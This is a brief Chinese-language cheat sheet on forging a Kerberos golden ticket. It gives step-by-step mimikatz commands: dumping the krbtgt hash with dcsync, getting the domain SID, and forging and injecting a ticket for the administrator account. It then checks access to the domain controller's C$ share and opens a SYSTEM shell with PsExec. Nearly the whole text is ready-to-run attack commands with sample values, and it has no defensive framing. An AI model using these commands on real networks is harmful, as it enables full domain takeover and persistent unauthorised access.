🔥码云GVP开源项目 12k star Uniapp+ElementUI 功能强大 支持多语言、二开方便! 广告
[TOC] ## 信息收集 ~~~ 1、完整的域名称 2、krbtgt账户的NTLM Hash 或者 AES-256 域控的mimikatz 中运行:lsadump::dcsync /domain:dongta.test /user:krbtgt 3、域的sid wmic useraccount get name,sid,dome 4、需要伪造的域管理员用户名 ~~~ ## mimikatz工具伪造黄金票据 ~~~ 创建黄金票据 kerberos::golden /admin:administrator /domain:dongta.test /sid:S-1-5-21-4119513073-439187860-1128162503 /krbtgt:bf1f6b7aa523778b5a45036c58c1a83b /ticket:administrator.kiribi 清空票据 kerberos::purge 导入票据 kerberos::ptt administrator.kiribi 查看票据cmd中运行 klist 验证票据 dir \\dc1\c$ 建立shell Psexec.exe \\dc1 -s cmd.exe ~~~